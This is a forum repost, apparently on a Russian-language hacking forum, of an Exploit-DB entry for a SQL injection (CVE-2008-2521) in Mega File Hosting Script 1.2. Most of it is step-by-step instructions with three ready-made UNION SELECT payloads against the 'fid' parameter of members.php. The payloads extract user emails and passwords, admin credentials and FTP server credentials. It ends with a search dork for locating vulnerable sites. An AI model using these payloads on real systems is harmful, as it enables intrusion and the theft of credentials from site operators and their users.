Exploit Mega File Hosting Script 1.2 - 'fid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5598
Проверка EDB
  1. Пройдено
Автор
TURKISHWARRIORR
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2521
Дата публикации
2008-05-12
Код:
########################################

Script: Mega File Hosting script

########################################

Type: SQL Injection

########################################

1923TURK.ORG
TURKiSHWARRiORR

Step 1: Register an account

Step 2: login and go to /members.php?folders=1

Step 3: Create a folder with any name

Exploitation options:

ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pass,5,6,7,8+from+users+-- to get the users

ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+setting+-- to get the admin info

ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+server+-- to get the ftp server info (if its configured)



#######################################

dork: "Powered by: MFH v1"

####################################### 

# milw0rm.com [2008-05-12]
 
Источник
www.exploit-db.com

Похожие темы